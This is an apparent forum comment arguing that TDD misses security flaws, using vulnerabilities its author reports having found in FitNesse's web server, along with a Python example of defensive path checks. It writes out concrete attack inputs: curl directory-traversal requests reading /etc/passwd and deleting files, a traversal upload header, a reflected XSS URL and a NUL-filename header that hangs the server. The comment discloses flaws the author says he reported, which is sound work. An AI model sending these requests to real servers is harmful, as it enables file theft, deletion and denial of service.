I got fed up with Robert Martin years ago.
11 years ago I wrote an essay on "Problems with TDD" - http://www.dalkescientific.com/writings/diary/archive/2009/1... .
Martin was rather against my viewpoint.
So, what's an example of TDD "done right"? It should be his "FitNesse" program, right? (http://fitnesse.org/ ) Which means that finding problems in that code should point out areas where TDD is insufficient, right?
It contains its own web server, so I looked at just that part.
1) There was a directory traversal attack, in several places. This gave access to my /etc/passwd
curl 'http://localhost:8080/files/../../../../../../etc/passwd'
2) This GET request deleted a file:
curl 'http://localhost:8080/files/?responder=deleteFile&filename=../../../../../../Users/dalke/This_is_a_file.txt'
3) This uploaded a file to an arbitrary location:
POST /files/../../ HTTP/1.1
containing a header with
Content-Disposition: form-data; name="file"; filename="I_escaped.txt"
4) There was a non-persistent cross-site scripting vulnerability due to incorrectly escaped HTML:
http://localhost:8080/files?responder=%3Cscript%3Ealert%28%22hi!%22%29%3C/script%3E
5) An uploaded file with an embedded NUL in filename would result in an infinite loop in the server:
Content-Disposition: form-data; name="file"; filename="\0foo.txt"
6) The password hashing scheme was trivially broken, that is, given the hash I could construct a password which generated the same hash. Take a look - it still uses the same hash algorithm! https://github.com/unclebob/fitnesse/blob/master/src/fitness...
These meant the system was totally p0wnable.
And I found a few public servers using FitNesse as the web server.
I reported all of these years ago, and at least some of them were fixed. If these security issues are still present now, there's been plenty of time to fix them.
My analysis helped confirm my view that TDD generates happy-path tests, and strengthen my complaint that TDD, at least in the "red-green-refactor" formalism, ignores the rest of the testing/design that needs to be done even at that development stage where TDD is most effective.
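One way a server could close the traversal and NUL-in-filename holes listed above, as an added Python example written for this thread rather than FitNesse's own (Java) code; the files root path is an assumed value:

```python
from pathlib import Path, PurePosixPath
from typing import Optional

# Assumed files root for the demo; FitNesse's real layout is not claimed here.
FILES_ROOT = Path("/srv/fitnesse/files")


def resolve_under_root(root: Path, requested: str) -> Optional[Path]:
    """Map a URL path such as '../../../../etc/passwd' to a filesystem path.

    Returns the canonical path only if it stays inside `root`, else None.
    The check runs on the normalised absolute path, not the raw string, so
    nested or oddly spelled '..' sequences all hit the same rule.
    """
    if "\x00" in requested:            # NUL bytes never belong in a path
        return None
    root = root.resolve()              # canonical root, symlinks collapsed
    # lstrip('/') stops an absolute request from replacing the root outright
    candidate = (root / requested.lstrip("/")).resolve()
    try:
        candidate.relative_to(root)    # raises if candidate left the root
    except ValueError:
        return None
    return candidate


def safe_upload_name(filename: str) -> Optional[str]:
    """Validate a Content-Disposition filename before touching the disk.

    Rejects NUL bytes and '..' names, and keeps only the final component,
    so the client can never choose the directory an upload lands in.
    """
    if not filename or "\x00" in filename:
        return None
    name = PurePosixPath(filename.replace("\\", "/")).name
    if name in ("", ".", ".."):
        return None
    return name


if __name__ == "__main__":
    # Constructed requests mirroring the ones reported in the comment above
    for req in ("../../../../../../etc/passwd", "reports/index.html"):
        print(req, "->", resolve_under_root(FILES_ROOT, req))
    for fn in ("\0foo.txt", "../../escaped.txt", "I_escaped.txt"):
        print(repr(fn), "->", safe_upload_name(fn))
```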
What fresh hell is this?